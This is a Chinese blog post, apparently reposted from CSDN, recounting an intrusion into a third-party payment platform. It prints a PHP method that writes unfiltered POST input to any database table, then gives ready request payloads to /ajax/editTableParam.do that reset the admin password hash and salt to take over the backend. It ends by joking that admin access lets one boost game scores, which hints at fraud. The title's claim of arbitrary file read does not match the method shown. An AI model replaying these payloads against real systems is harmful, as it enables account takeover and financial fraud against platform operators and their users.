记一次某三方支付平台渗透-任意文件读取后获得后台

记一次某三方支付平台渗透-任意文件读取后获得后台

如果有志同道合的技术朋友可以加我QQ:2849084774。

项目:

提示:这是一个某支付平台的源码
例如:项目场景:该平台用于对接一些特殊行业,你懂的,总他的源码可以看出下面的问题


问题描述:

提示:明显有一个修改库信息的的地方,并且没有过滤
下面是源码:

    public function editTableParam()
    {

        $table      = input('post.table'); 
        $param      = input('post.param'); 
        $value      = input('post.value'); 
        $id         = input('post.id', 'id'); 
        $idValue    = input('post.idValue'); 
        return Db::name($table)->where([$id => $idValue])->update([$param => $value]);
    }

于是写下payload:

根据自己搭建数据库的表明得知它的密码是通过盐值来加密,因此自己生成一个盐值、
在这里插入图片描述

/ajax/editTableParam.do

payload="table=admin&param=name&value=ceshi001&idValue=1"
table=admin&param=passwd&value=a91545d4ecf70aaa68acbe3e13792777&&idValue=1
table=admin&param=passwd_salt&value=2xh2J3HYDITwZqv4AyGx&idValue=1
    }

注入成功:然后直接在后台登陆你的账号密码即可

请勿用于非法用途
得到后台管理员权限,那就可以给心爱的游戏直接上分啦,效果你懂得!!!

这种源码发现了好几个漏洞,没想到啊

猜你喜欢

转载自blog.csdn.net/scottqian84/article/details/108418598